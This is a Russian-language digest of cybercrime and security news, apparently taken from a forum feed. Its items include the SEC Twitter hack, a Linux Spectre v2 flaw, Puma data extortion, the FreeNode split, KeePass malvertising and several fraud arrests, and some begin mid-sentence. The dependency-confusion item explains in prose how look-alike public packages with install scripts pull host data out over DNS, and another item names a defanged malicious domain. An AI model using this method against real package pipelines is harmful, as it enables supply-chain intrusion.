Официальный аккаунт Комиссии по ценным бумагам и биржам США в Твиттере был «скомпрометирован» и было отправлено сообщение, в котором говорилось, что он «даёт одобрение #Bitcoin ETF для листинга на всех зарегистрированных национальных биржах ценных бумаг».
По данным CoinGecko , на короткое время биткойн подскочил до $47 880 а затем
упал до $44 600 ( на бирже BitMex), на момент написания статьи биткоин
торгуется на уровне $45800
Именно председатель SEC Гэри Генслер через несколько минут после того, как
твит SEC вышел из основного аккаунта в 16:11 по восточному стандартному
времени, опроверг эту новость своим собственным твитом.
«Комиссия по ценным бумагам и биржам (SEC) не одобрила листинг и торговлю спотовыми биржевыми продуктами биткойнов», — заявил Генслер во вторник днем.

Decrypt ](https://decrypt.co/212190/sec-twitter-account-hacked-sends-false- bitcoin-etfs-approved-tweet)
The SEC Twitter account was hacked on Tuesday, leading to a fake announcement that all Bitcoin ETFs had been approved.
 decrypt.co
P.S Инсайдеры могли прилично заработать на данном движении
Бутылизация прошла при высадке с судна.
Сразу четверо кардеров были арестованы при высадке с роскошного круизного судна Carnival Celebration в штате Флорида. В местной полиции считают, что все они не только купили тур на украденные деньги, решив таким образом уйти в заслуженный отпуск, но и платили краденными кредитками за услуги на борту.
Кардерами оказались трое мужчин и одна женщина в возрасте от 29 до 31 года. В числе совершенных ими покупок оказались достаточно дорогостоящие — на суммы от 2700 до 20 тысяч долларов. При этом столько же (20 тысяч) каждый из них выложил за сами билеты на семидневное путешествие по Карибским островам.
Известно также, что около 11 тысяч долларов были отмыты через корабельное казино. Один из кардеров купил фишки на чужие карточки, после чего сделал несколько незначительных ставок и обменял фишки уже на чистые деньги. Попались члены группы по глупости: после того, как терминал выдал отказ по одной из операций, их попросили предоставить документы на те же имена, на которые был выписан пластик. Но сделать они этого не смогли.
Все четверо содержатся под стражей. Каждый из них имеет право выйти под залог (от 16 тысяч до 26 тысяч долларов), однако никто этой опцией пока не воспользовался.
source: cruisehive.com/carnival-passengers-arrested-for-credit-card-fraud- onboard/115062
В ядре Linux 6.2 выявлена [уязвимость](https://github.com/google/security- research/security/advisories/GHSA-mj4w-6495-6crx) (CVE-2023-1998), приводящая к отключению защиты от атак класса Spectre v2, позволяющих получить доступ к памяти других процессов, выполняемых в разных потоках SMT или Hyper Threading, но на одном физическом ядре процессора. Уязвимость, среди прочего, может использоваться для организации утечки данных между виртуальными машинами в облачных системах. Проблема затрагивает только ядро Linux 6.2 и вызвана некорректной реализацией оптимизаций, призванных снизить значительные накладные расходы при применении защиты от Spectre v2. Уязвимость устранена в экспериментальной ветке ядра Linux 6.3.
В пространстве пользователя для защиты от атак класса Spectre процессы могут выборочно отключать спекулятивное выполнение инструкций при помощи prctl PR_SET_SPECULATION_CTRL или использовать фильтрацию системных вызовов на базе механизма seccomp. По данным выявившую проблему исследователей некорректная оптимизация в ядре 6.2 оставила без должной защиты виртуальные машины как минимум одного крупного облачного провайдера, несмотря на включение режима блокирования атак spectre-BTI через prctl. Уязвимость также проявляется и на обычных серверах с ядром 6.2, при загрузке которых используется настройка "spectre_v2=ibrs".
Суть уязвимости в том, что при выборе режимов защиты IBRS или eIBRS внесённые оптимизации отключали применение механизма STIBP (Single Thread Indirect Branch Predictors), необходимого для блокирования утечек при применении технологии одновременной многопоточности (SMT или Hyper-Threading). При этом защиту от утечки между потоками обеспечивает только режим eIBRS, но не режим IBRS, так как при нём бит IBRS, обеспечивающий защиту от утечек между логическим ядрами, из соображений производительности очищается при возвращении управления в пространство пользователя, что делает потоки в пространстве пользователя не защищёнными от атак класса Spectre v2.
Необычный метод дал неожиданный результат.
21 июля 2022 года компания Censys заявила, что обнаружила несколько хостов, связанных с вымогательским ПО MedusaLocker. Подозрительные хосты удалось обнаружить с помощью необычного метода – сканирования хостов на предмет инструментов для пентеста.
Просканировав 7,4 миллиона россиийскх хостов, на 9 из них компания обнаружила инструмент для пентеста Metasploit , а на одном – комбинацию из Acunetix, Posh и Deimos. Так как “комбо” из инструментов было собрано только на одном сервере, эксперты Censys посчитали, что такой набор инструментов не принадлежит компании, занимающейся пентестом. Подозрения оказались не напрасными. Проанализировав сертификаты, данные о хостах и “отпечатки пальцев”, собранные с помощью Jarm, специалисты обнаружили дополнительные хосты по всему миру, связанные с вымогательским ПО MedusaLocker.
По словам исследователей компании, вся найденная ими информация и образцы вредоносного ПО говорят о том, что компьютеры жертв становились прокси- серверами, используемыми для маскировки атак и переводов криптовалюты. Censys обнаружила жертв в США (штаты Вирджиния, Огайо, Нью-Джерси и Калифорния), Тайване, Китае и Нидерландах. Сейчас специалисты пытаются связаться с жертвами, чтобы помочь им защититься от вредоносного ПО.
Напомним, что в феврале стартап в области кибербезопасности Censys получил
дополнительное финансирование в размере 35 млн долларов США от
технологического гиганта, корпорации Intel.
Среди предыдущих инвесторов Censys - Google Ventures и Greylock Partners, а
среди клиентов компании - вооруженные силы Швейцарии, Министерство внутренней
безопасности США и несколько компаний из списка Fortune 500.
пытался ограничить доступ в Сеть своим детям.
Двое подростков ночи напролет сидели в соцсетях, отцу это не нравилось, поэтому он купил глушитель связи. После этого от жителей коммуны Мессанж начали поступать жалобы, что ежедневно с полуночи до 3:00 у них не работает Интернет. Выяснилось, что всему виной глушитель, в соседнем муниципалитете установленный отцом подростков, которых он ограничивал в посещении соцсетей как раз с 00:00 до 3 ночи.
Эффект от глушителя оказался гораздо масштабнее, чем ожидалось, связь легла у жителей двух муниципалитетов. Во Франции использование глушителей запрещено. Устройство конфисковали, а установившему его французу грозит штраф до 30 тысяч евро и полгода тюрьмы.
Злоумышленники похитили данные у производителя спортивной одежды Puma и теперь
требуют у компании выкуп, угрожая опубликовать украденную информацию в
даркнете.
Издание [The Record](https://therecord.media/hackers-stole-puma-source-code-
no-customer-data-company-says/) сообщает, что пост с угрозами появился на
сайте Marketo еще в конце августа. Роберт-Ян Бартунек (Robert-Jan Bartunek),
глава отдела корпоративных коммуникаций Puma, подтвердил журналистам, что у
компании произошла утечка, и сказал, что в руках хакеров оказался исходный код
внутреннего приложения Puma. Также он подчеркнул, что инцидент не затронул
данные пользователей.
[](https://xakep.ru/wp- content/uploads/2021/09/358869/Puma-data.png)
Хакеры утверждают, что похитили у компании более 1 Гб данных. Чтобы подкрепить эти заявления доказательствами, злоумышленники обнародовали примеры некоторых файлов, которые, судя по всему, были взяты из официального Git-репозитория Puma.
[](https://xakep.ru/wp- content/uploads/2021/09/358869/Puma-source-code.png)
Даркнет-ресурс Marketo работает с апреля 2021 года по следующей схеме:
операторы сайта составляют список будущих жертв, а затем добавляют к нему
доказательства взлома (обычно небольшой архив). Если пострадавшая компания
отказывается платить, ее данные либо публикуются на сайте бесплатно, либо
распространяются только среди VIP-членов ресурса.
Сайт утверждает, что публикует информацию, предоставленные несколькими
хакерскими группами, но не работает с вымогателями. Сейчас на Marketo
перечислены такие компании, как Siemens Gamesa, Kawasaki, Fujitsu и так далее.
«Сейчас я могу сказать, что Puma еще не связалась с нами. Оставшиеся данные будут опубликованы, если Puma откажется от переговоров», — сообщил журналистам представитель Marketo.
Click to expand...
Источник: https://xakep.ru/2021/09/13/puma-leak/
Хотя многие считают, что кибератаки могут привести к обострению противостояния между великими державами, которое чревато фатальными последствиями, кибервойна в целом может помочь избежать лишних жертв и сделать мир безопаснее, пишет The New York Times. Как отмечает газета, цифровая война даёт уникальную возможность перевести конфликты в нелетальное русло, способствуя выполнению политических целей без гибели людей.
Битвы, идущие в киберпространстве, можно заметить нечасто, причём только в ретроспективе: примером тому стали атаки на Colonial Pipeline и SolarWinds, а также вымогательская программа WannaCry, пишет The New York Times.
Однако учитывая, что подобные события становятся известными широкой общественности лишь эпизодически, тот факт, что противостояние государств, преступных сетей и частных субъектов в киберпространстве идёт прямо в этот самый момент, довольно неочевиден.
Подобное осознать трудно, ведь это так непохоже на традиционные войны, которые бушевали многие тысячелетия. В этом контексте возникает вопрос: как же нужно классифицировать кибератаки? Это шпионаж? Саботаж? Акт войны? Некоторые кибератаки, вроде взлома Sony Pictures Северной Кореей, предполагают участие в них государств. Другие же кибератаки осуществляются обычными преступниками. Однако шпион и хакер похожи друг на друга в одном: они оба получают доступ к чужой информации.
Во времена холодной войны США, Китай и Россия располагали арсеналами, способными уничтожить весь мир. Теперь же эти страны регулярно пользуются киберсредствами — хотя и не в полную силу, — чтобы выводить из строя электросети, системы водоснабжения, а также наносить удары по обществу.
При этом, несмотря на то, что кибератаки влекут за собой различные неприятные последствия, гибель людей — во всяком случае пока — к их числу не относится.
Учитывая, что конфликты, начавшиеся в результате терактов 11 сентября, внезапно подошли к концу, мир оказался на перепутье: ему предстоит определиться, насколько далеко люди готовы зайти в своих кибервойнах. При этом не исключено, что цифровые технологии только обострят конфликты между великими державами.
Однако существует и альтернативная точка зрения на эту проблему, в рамках которой кибервойна рассматривается как способ уменьшить реальное насилие. «Способна ли такая тактика сместить акцент войны с человеческих жертв на другие вещи?» — задаётся вопросом The New York Times.
Иными словам, могут ли страны выяснять отношения в онлайн-пространстве, а не с помощью ракет?
Цифровая война даёт уникальную возможность продолжать политику другими средствами, но без физического вторжения на суверенную территорию и гибели людей. Учитывая, что боевые действия на кибервойне более упорядочены, конфликт такого рода более гибок и безопасен по сравнению с обычным противостоянием. При этом кибервойна может занять промежуточное место между такими инструментами, как санкции и бомбы.
«Цель войны — не война сама по себе; её цель — это достижение некой политической цели, — отметила приглашённый профессор Школы переводых международных исследований Джона Хопкинса Нора Бенсахель. — Если вы сможете достичь этой цели без кинетического столкновения, то тем лучше».
Вспомнить только операцию Nitro Zeus. В конце 2000-х годов, как сообщала The New York Times, правительство США разработало подробный план кибератак, которые должны были вывести из строя определённые элементы иранской ПВО, а также системы связи и электросети этой страны. Данный план был предложен президенту Бараку Обаме в целях нейтрализации сил Ирана на тот случай, если переговоры о свёртывании ядерной программы Тегерана провалятся и последний попытается нанести ответный удар.
Учитывая, что в 2015 году стороны всё же пришли к соглашению, а план Nitro Zeus положили под сукно, его масштабы оценить довольно тяжело, как и вероятность сопутствующего ущерба при его реализации. Вместе с тем включение кибероружия в стратегию национальной безопасности говорит об определённом нежелании Вашингтона пользоваться обычными и более смертоносными средствами. В то же время кибератака в любом случае будет приводить к пагубным последствиям как для гражданских лиц, так и частных предприятий, напоминает издание.
Однако, хотя это и может показаться нелогичным, кибероружие также может укрепить геополитическую стабильность. В частности, по словам профессора Массачусетского технологического института и специалиста по ядерной стратегии Випина Наранга, кибератаки помогли ряду стран добиться нераспространения ядерного оружия в ситуации, когда в ином случае потребовалось бы применять силу в реальном мире, что чревато жертвами.
В 2007 году Израль нанёс мощный удар по объекту в Сирии, где, как предполагалось, находился ядерный реактор. Комплекс был уничтожен, после чего Израиль попал под шквал критики из-за того, что он нарушил суверенитет другой страны. При этом, по имеющимся данным, в ходе авиаудара погибли десять северокорейских учёных.
Однако американо-израильская кибероперация под названием Stuxnet, которая проходила примерно в то же время, достигла той же цели — она помешала стране- изгою Ирану обогатить уран, причём тогда обошлось без ударов с воздуха и человеческих жертв. Одноимённая вредоносная программа уничтожила почти 20% активных центрифуг Ирана, значительно затормозив его ядерную программу. В ходе операции не пострадал ни один человек; более того, весьма возможно, что успех этой операции удержал Израиль от нанесения обычных ударов по иранским ядерным объектам.
Но какое же использование кибероружия можно считать разумным?
Если война в киберпространстве может перевести конфликт в нелетальное русло, то сейчас настало время для разработки договоров и неписаных норм, регулирующих применение соответствующих средств, причём заняться этим следует, пока этот инструментарий не начал играть значительную роль на поле боя.
Многие лидеры технологического сектора уже призывают к созданию цифровой Женевской конвенции, которая законодательно закрепит правила ведения кибервойны, а также запретит саботаж гражданской инфраструктуры. Не менее важную роль должны играть также и неформальные договорённости.
Кроме того, страны должны пытаться избегать ошибочной атрибуции кибератак и пресекать коммерческую киберпреступность. В частности, США необходимо поддерживать связь со своими противниками, что помешает выдвижению ложных обвинений и предотвратит обострение ситуации.
Но что же касается «киберПёрл-Харбора», о котором так любят спекулировать в СМИ? «Скорее всего, такого мы никогда не увидим, — считает один из основателей фирмы CrowdStrike Дмитрий Альперович. — Однако речь может идти о смерти от тысячи порезов, когда каждую неделю и каждый день мы сталкиваемся с атаками вымогателей».
«При надлежащем контроле и наличии некоторых правил игры кибервойна между нациями может оказаться не таким уж и плохим явлением. Ведь вместо того, чтобы подвергать опасности жизни, на деле она может их спасать. И эту важную мысль следует вспоминать каждый раз, когда появляется новость о новом крупном взломе», — подытоживает The New York Times.
Команда, занимавшаяся поддержанием IRC-сети FreeNode, популярной в среде разработчиков открытого и свободного ПО, прекратила сопровождение проекта и основала новую IRC-сеть libera.chat, призванную занять место FreeNode. Отмечается, что старая сеть, в которой используются домены freenode.[org|net|com], перешла под контроль сомнительных личностей, доверие к которым под вопросом. О перемещении своих IRC-каналов в сеть libera.chat уже объявили проекты CentOS и Sourcehut, переход также обсуждают разработчики KDE.
В 2017 году холдинг FreeNode Ltd был продан компании Private Internet Access (PIA), которой перешли доменные имена и некоторые другие активы. Условия сделки не были раскрыты команде FreeNode. Фактическим владельцем доменов FreeNode стал Эндрю Ли (Andrew Lee). Все серверы и элементы инфраструктуры оставались в руках добровольцев и спонсоров, предоставляющих серверные мощности для работы сети. Поддержанием и управлением сетью занималась команда добровольцев. Компания Эндрю Ли лишь владела доменами и никак не пересекалась с самой IRC-сетью.
Изначально Эндрю Ли заверил команду FreeNode, что его компания не будет вмешиваться в работу сети, но несколько недель назад ситуация изменилась и в сети стали происходить изменения, относительно которых команда FreeNode так и не получила разъяснений. Например, была удалена страница с объявлением об оптимизации структуры управления, размещена реклама компании Shells, сооснователем которой является Эндрю Ли, и началась работа по получению операционного контроля над инфраструктурой и всей сетью, включая данные пользователей.
По мнению команды добровольцев, Эндрю Ли решил, что владение доменами даёт ему право на полное управление самой сетью Freenode и сообществом, нанял отдельный персонал и попытался добиться передачи ему прав по администрированию сети. Активность по переводу инфраструктуры под управление коммерческой компании создала угрозу попадания данных пользователей в руки третьих лиц, о которых у старой команды Freenode нет никаких сведений. Для сохранения независимости проекта была организована новая IRC-сеть Libera.Chat, курируемая некоммерческой организацией в Швеции и не допускающая перехода управления в руки коммерческих компаний.
Эндрю Ли не согласен с такой трактовкой событий и указывает, что проблемы начались после того, как Кристель (Christel), бывший лидер FreeNode, разместила на сайте упоминание компании Shells, предоставляющей финансирование на поддержание сети в размере 3 тысячи долларов в месяц. После этого Кристель подверглась травле и ушла с поста лидера, который занял Томо (Tomaw) и без переходного процесса и передачи полномочий блокировал доступ Кристель к инфраструктуре.
Эндрю Ли предложил реформировать управление и сделать его более децентрализованным, чтобы исключить зависимость от отдельных лиц, но в ходе переговоров согласился, что до всестороннего обсуждения не нужно что-то менять в управлении и траектории развитии проекта. Вместо продолжения обсуждения Томо начал свои закулисные игры и изменил сайт, после чего конфликт обострился и Эндрю Ли привлёк юристов. По словам Эндрю Ли, он желает лишь, чтобы FreeNode оставалась отличной IRC-сетью и готов для этого как и раньше предоставлять юридическую и финансовую поддержку, но считает действия нынешнего лидера недопустимыми и враждебными, а высказывания ложью и клеветой.
Эндрю Ли объясняет предпринимаемые сейчас действия как желание защитить FreeNode, так как у него есть основания сомневаться в том, что под руководством Томо проект сможет стабильно существовать. При этом Эндрю Ли продолжает доверять сообществу FreeNode и думает, что сообща проблему с управлением удастся решить, например через децентрализацию управления.
ИБ-эксперт Алекс Бирсан (Alex Birsan) рассказал о новой проблеме, которая представляет собой вариацию атаки на цепочку поставок, получившую название dependency confusion (путаница зависимостей) или substitution attack (атака на замещение). За обнаружение этого способа атак исследователь уже получил от различных компаний более 130 000 долларов по программам bug bounty. Дело в том, что, используя эту проблему, специалист сумел загрузить собственный (безвредный) код в системы Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla, Uber и других компаний.
Суть dependency confusion проста: малварь из опенсорсных репозиториев (включая PyPI, npm и RubyGems) автоматически распределяется дальше по всей цепочке поставок, проникая во внутренние приложения компаний без какого-либо участия пользователей. Именно это отличает атаку от обычного тайпсквоттинга.
На эту простую идею Бирсана в прошлом году натолкнул его коллега, еще один ИБ- эксперт Джастин Гарднер (Justin Gardner). Тот поделился с Бирсаном файлом манифеста package.json из npm-пакета, используемого внутри PayPal. Оказалось, что некоторых пакетов из манифеста нет в общедоступном репозитории npm, это приватные пакеты, созданные инженерами PayPal, и они используются и хранятся только внутри компании.

Глядя на это, Бирсан задался вопросом, должен ли пакет с таким же именем существовать в общедоступном репозитории npm, и если да, то какой из них в итоге будет иметь приоритет? Чтобы проверить свою теорию, исследователь начал искать названия других приватных пакетов, которые можно обнаружить в файлах манифестов в репозиториях GitHub или в CDN известных компаний, но которых нет в общедоступных репозиториях.
Обнаружив несколько таких целей, Бирсан стал создавать фейковые проекты с такими же названиями в npm, PyPI и RubyGems (хотя Бирсан отмечает, уязвимы и другие менеджеры пакетов, в том числе JFrog и NuGet). Эксперт создавал эти фальшивки из-под своего аккаунта и сопровождал пояснением, что они предназначены исключительно для исследования безопасности и не содержат никакого полезного кода.

Этот эксперимент показал, что если пакет зависимостей, используемый приложением, существует как в общедоступном опенсорсном репозитории, так и частной сборке, публичный пакет в итоге получает приоритет и будет использован без каких-либо действий со стороны разработчика. Также оказалось, что в случае с пакетами PyPI пакет с более высокой версией имеет приоритет независимо от того, где он расположен.
Затем, используя ту же тактику, Бирсан осуществил успешные атаки на Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp, Uber и другие крупные компании, просто опубликовав пакеты с такими же именами, как у пакетов, используемых внутри компаний.
«Такие уязвимости и недоработки в автоматизированных инструментах для сборки или установки могут привести к тому, что общедоступные зависимости будут ошибочно приниматься за внутренние зависимости с таким же именем», — рассказал изданию Bleeping Computer Бирсан.
Click to expand...
Все тестовые пакеты исследователя содержали предустановленные скрипты, которые автоматически запускали скрипт для извлечения идентифицирующей информации с «зараженной» машины, сразу после пула пакетов. Понимая, что его скрипты будут устанавливать соединение из защищенных корпоративных сетей, Бирсан решил обойти механизмы безопасности, использовав DNS для извлечения данных.

Пример работы такого скрипта можно увидеть на иллюстрации ниже: он сообщал исследователю, что IP-адрес, с которого исходит запрос, принадлежит PayPal, а также сообщал имя пользователя и домашний каталог пострадавшей системы.

Собрав таким образом данные и убедившись в своей правоте, исследователь начал сообщать о своих выводах уязвимым компаниями, получая вознаграждения в рамках программ bug bounty. К примеру, PayPal уже обнародовала отчет эксперта на HackerOne и выплатила ему 30 000 долларов; Yelp тоже подтвердила выводы Бирсана и вознаградила его 15 000 долларов.
Но серьезнее всех к dependency confusion, пожалуй, отнеслась компания Microsoft. Данной проблеме был присвоен идентификатор CVE-2021-24105 (для Azure Artifactory), и компания не только выплатила эксперту 40 000 долларов, но и опубликовала собственный технический документ, где подробно описывает проблему и предлагает методы ее решения. В частности, инженеры Microsoft рекомендуют минимизировать риски, защищая приватные пакеты с помощью контролируемых областей в публичных репозиториях, а также путем использования верификации на стороне клиента (закрепление версий, проверка целостности).
Источник: xakep.ru/2021/02/11/dependency-confusion/
При процессуальном руководстве прокуроров Офиса Генерального прокурора двум лицам сообщено о подозрении в несанкционированном вмешательстве в работу информационных, электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей, создании с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространении или сбыте, а также в краже (ч. 5 ст. 361, ч. 1 ст. 361-1, ч. 4 ст. 185 УК Украины).
По данным следствия в течение 2022-2024 года подозреваемые распространяли вредоносные программные средства и несанкционированно вмешивались в работу электронно-вычислительных машин лиц, проживающих на территории США, что привело к утечке информации. Целью несанкционированного вмешательства является тайное похищение чужого имущества.
Сообщники осуществляли скрытые входы в ЭВМ третьих лиц, без их ведома и согласия, в результате чего происходил виток информации, в частности о сохраненных реквизитах платежных карт. В дальнейшем эти данные были тайно использованы для оплаты товара на одной из мировых торговых платформ якобы от имени владельцев этих карточек.
В результате противоправных действий нарушителей международному маркетплейсу нанесен ущерб на более 1,2 млн грн.
Правоохранители пресекли эту незаконную деятельность. Орудие совершения преступления передано для проведения компьютерно-технических экспертиз.
Досудебное расследование проводят следователи Главного следственного управления Нацполиции Украины при оперативном сопровождении сотрудников ВКИБ управления Службы безопасности Украины в Черниговской области.
Досудебное расследование продолжается.
Полиция Сингапура расследует дело в отношении семи человек, подозреваемых в продаже счетов Worldcoin и предоставлении услуг по торговле токенами. Речь идет о потенциальном нарушении Закона о платежных услугах, сообщил заместитель премьер-министра страны Ган Ким Ен.
Согласно информации MAS, сам Worldcoin не классифицируется как платежная услуга, но те, кто торгует счетами и токенами проекта, потенциально могут предлагать ее. Это требует получения лицензии для дальнейшей деятельности.
Ким Ен предостерег пользователей от передачи доступа к своим токенам или идентификаторам World ID, поскольку эти учетные записи могут быть использованы третьими лицами.
В августе полиция Сингапура арестовала пятерых человек, подозреваемых в покупке или продаже аккаунтов и токенов Worldcoin.
По предварительным данным, трое из них вербовали людей от имени различных организаций для создания аккаунтов на платформе за вознаграждение. Затем учетные записи передавались двум другим фигурантам.
В ходе операции полиция изъяла более 200 мобильных телефонов. Подозреваемым в случае доказательства вины грозит штраф до $125 000 или тюремный срок до трех лет.
Расследование продолжается.
Напомним, проект Worldcoin работает над созданием глобальной цифровой идентификационной и финансовой сети. Протокол подтверждает личность пользователя посредством сканирования радужной оболочки глаза.
Регуляторы многих стран выразили обеспокоенность подобным сбором биометрических данных. Власти Франции, Великобритании, Гонконга, Колумбии, Аргентины и других начали расследования потенциального нарушения конфиденциальности граждан.
• Source: https://www.mas[.]gov.sg/news/parliamentary-replies/2024/written- reply-to-parliamentary-question-on-risks-relating-to-worldcoin-in-singapore
• Source: https://www.police[.]gov.sg/media- room/news/20240807_four_men_and_one_woman_arrested_for_suspected_involvement
Следователи объявили подозрение трем членам организованной группы, которые выманивали у украинцев средства, обещая работу в Швеции. Злоумышленникам избраны меры пресечения. Им грозит до 12 лет лишения свободы.
Киберполицейские Киева совместно со следователями Днепровского управления столичной полиции под процессуальным руководством Днепровской окружной прокуратуры прекратили деятельность организованной группы, которая занималась онлайн-мошенничеством под предлогом предоставления услуг по трудоустройству за рубежом.
Мужчина и две его знакомые через соцсети и мессенджеры распространяли объявления, в которых предлагали работу в Швеции. В ходе общения с заинтересованными гражданами аферисты сообщали им перечень вакансий за рубежом, процедуру получения первоочередных документов для мигрантов, условия проживания и питания.
Соискатели работы должны были уплатить мошенникам за «услуги» средства в размере 3 тысячи гривен на территории Украины и 300 евро по приезду за границу якобы представительницы агентства по трудоустройству.
После получения средств последняя показывала гражданам путь к хостелу для мигрантов. В дальнейшем подозреваемые переставали выходить на связь с потерпевшими, которые так и не получали работы.
Оперативники киберполиции установили, что от противоправных действий фигурантов пострадали по меньшей мере 40 граждан. Сумма убытков составляет 600 тысяч гривен.
Полицейские провели обыски по местам жительства фигурантов. Изъяты мобильные телефоны, банковские и сим-карты, компьютерная техника, документы и черновые записи.
Жителю Киева и его сообщнице следователи объявили подозрение в совершении уголовного правонарушения, предусмотренного ч. ч. 4, 5 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до 12 лет лишения свободы с конфискацией имущества.
Мужчине избрана мера пресечения в виде содержания под стражей, а его пособница судом помещена под круглосуточный домашний арест.
Женщине, которая выдавала себя за представительницу агентства по трудоустройству, следователи объявили подозрение заочно. Сейчас продолжаются следственные действия с целью установления местонахождения подозреваемой, возможных сообщников фигурантов и полного круга потерпевших лиц.
Специалисты предупреждают о новой опасности, связанной с использованием публичных Wi-Fi сетей, которая может привести к угону аккаунтов в мессенджере Телеграм. Был обнаружен мошеннический Wi-Fi в аэропорту Шереметьево, однако, такая угроза может поджидать пользователей в любом месте, где доступен бесплатный открытый Wi-Fi.
Мошенники используют схему, при которой пользователь, подключаясь к такой сети (в нашем случае это была сеть под названием SVO_Free), получает сообщение о необходимости регистрации через аккаунт в Телеграме. После отправки кода доступа мошенники получают полный контроль над аккаунтом, а пользователь теряет к нему доступ.
Для предотвращения подобных инцидентов, эксперты настоятельно рекомендуют никогда не вводить коды доступа к Телеграму при подключении к Wi-Fi, не использовать для доступа в интернет открытые бесплатные Wi-Fi сети, а вместо этого использовать мобильный интернет. Также важно периодически проверять список подключенных устройств в настройках Телеграма, чтобы вовремя обнаружить несанкционированный доступ.
Исследователи Malwarebytes обнаружили вредоносную рекламную кампанию в Google Ads, продвигающую фейковый сайт менеджера паролей KeePass. Мошенники использовали Punycode, чтобы замаскировать свой домен под настоящий, и распространяли таким способом малварь.
Punycode был разработан для однозначного преобразования доменных имен в
последовательность ASCII-символов.
Злоумышленники давно поняли, что можно злоупотреблять Punycode для регистрации
доменных имен, которые выглядят похожими на легитимные, но содержат какой-либо
Unicode-символ, который выглядит немного иначе.
В итоге этот вредоносный домен продвигали в рекламе через Google Ads, имитируя рекламу настоящего KeePass. Если жертва не замечала ничего странного и кликала по такому объявлению мошенников, срабатывал редирект, который проверял, что жертва не является краулером, ботом, не использует песочницу и так далее, после чего пользователь попадал на поддельный сайт https://xn--eepass- vbb[.]info.
На сайте мошенников, который прикидывался официальным сайтом KeePass, пользователю предлагали скачать «менеджер паролей». Нажатие на любую ссылку для скачивания приводило к загрузке подписанного установщика MSI с названием KeePass-2.55-Setup.msix, который содержал PowerShell-скрипт, связанный с загрузчиком малвари FakeBat.
Там он должен был опознать своих собеседников — потому что они внезапно «умерли».
60-летнего Андрея Павловича начали обманывать по классике: ему позвонил «сотрудник банка», сообщивший об утечке персональных данных. Затем мужчину перевели на специалиста Маргариту, которая ещё раз припугнула «клиента» и ради спасения средств попросила перекинуть всё на «безопасные» счета. Так Андрей Павлович лишился 4,8 миллиона рублей, однако после столь банальной разводки его ждал мистический поворот.
Примерно месяц спустя на связь с ним вместо Маргариты вышел уже некий Алексей. Он с горечью рассказал, будто бы все его коллеги, общавшиеся с мужчиной, скоропостижно скончались. Бонусом к этой новости Андрей получил странное предложение: поехать на Введенское кладбище и опознать умерших «сотрудников банка».
Почуяв какую-то нездоровую гоголевскую атмосферу, мужчина позвонил на кладбище. Вот только там имена усопших услышали впервые — и лишь тогда Андрей Павлович понял, что попался мошенникам. Хотя не исключено, что за 4,8 миллиона они просто сумели откупиться от смерти.
На этой неделе Центральная криминальная полиция (ЦКП) провела в Таллинне процессуальные действия в отношении двух подростков, которых подозревают во взломе инфосистемы посылочных автоматов Itella и скачивании данных почти 10 000 человек.
По предварительным подозрениям, двое местных жителей в возрасте 15 и 19 лет получили доступ к инфосистеме Itella и скачали данные почти 10 000 человек. Подозреваемые составили подробный обзор уязвимых мест в системе безопасности и опубликовали его в интернете вместе с данными людей, сделав их имена, адреса электронной почты и номера мобильных телефонов общедоступными.
Расследование начато по статье пенитенциарного кодекса о незаконном получении доступа к компьютерной системе, 19-летнего подростка также подозревают в использовании поддельного документа.
"Личность подозреваемых была установлена, несмотря на их попытки скрыть свои следы", - сказал глава бюро по борьбе с киберпреступлениями ЦКП Аго Амбур.
"Поиск уязвимых мест в системе безопасности, мотивированный финансовым или интеллектуальным интересом, - очень распространенное явление в кибермире. Существуют способы, которые позволяют находить слабости в системе законным путем и ответственно информировать о них. Однако в данном случае информационная система была взломана без согласия владельца, данные были скачаны, а подробная информация о нарушении безопасности размещена в социальных сетях для всеобщего ознакомления", - сказал он.
По словам госпрокурора Вахура Верте, мотивы поступка и точную роль подозреваемых предстоит выяснить в ходе дальнейшего расследования.
Расследование ведет бюро по борьбе с киберпреступностью при ЦКП под руководством госпрокуратуры.
медицину, то подрабатывала на онлайн-платформе «OnlyFans», где получила первые необычные запросы, сообщает AFP.
«Когда у меня впервые попросили бутылку моей слюны, я подумала, что это шутка и не может быть серьезной, пока не поняла, что это так», — рассказывает она Caters News: «Все, что вы можете себе представить, люди этого хотят».
Она спонтанно назвала цену в 300 фунтов (примерно 345 евро) — самую высокую
сумму, которую она все еще считала разумной.
Когда ей без колебаний заплатили, родилась ее новая бизнес-модель.
Сейчас женщина продает не только свою слюну, но и исполняет всевозможные другие необычные желания, сообщает издание.
«У меня были люди, которые просили простыни, в которых я спала в течение
недели, потную спортивную одежду, воду для ванны, зубные щетки и слюну от
зубной пасты», — делится секретами Джонс.
Благодаря «OnlyFans» она теперь настолько успешна, что смогла не только
бросить свою подработку в Tesco, но и учебу в колледже.
На заработанные деньги она смогла расплатиться как с долгами, купить дом и лошадь своей сестре.
Молодой хакер атаковал ресурсы Правительства Калужской области. С помощью вредоносной программы 22-летний житель города Щучье Курганского области со своего ПК пытался взломать защиту компьютерной информации.
Досталось и ресурсам Министерства транспорта и дорожного хозяйства Саратовской области. Попытка взлома важной информации не удалась.
Парня задержали сотрудники УФСБ. Суд приговорил его к 1,6 годам колонии.
Программа занижает суммы транзакций и позволяет продавцу платить меньше налогов.
Налоговые службы Австралии, Канады, Франции, Великобритании и США провели совместное расследование в отношении «программного обеспечения для подавления электронных продаж» — приложений, которые фальсифицируют данные о точках продаж (Point of Sale, PoS) с целью уклонения от уплаты налога.
В объявлении Объединенного комитета начальников налоговых органов (J5) говорится, что расследование «привело к аресту 5 человек в Соединенном Королевстве, которые предположительно разрабатывали и продавали электронные системы подавления продаж (Electronic Sales Suppression Software, ESS) на международном уровне». Арестованные начали распространять ПО ещё во время пандемии COVID-19.
Программа для подавления продаж называется Zapper и позволяет ритейлерам вести отдельные бухгалтерские документы и отмывать деньги за одну транзакцию. Продавцы могут скрывать и переводить этот доход анонимно, иногда в офшоры
Приложение работает так – клиент в ресторане заказал стейк за $60 и бутылку вина за $100, а в этот момент ПО изменяет транзакцию так, что она регистрируется в PoS-системе как «порция чипсов за $10 и бутылка безалкогольного напитка за $4». Клиент платит за свой заказ $160 и не замечает какие-либо махинации. Ресторан регистрирует доход в размере $14, а $146 он может отмыть.
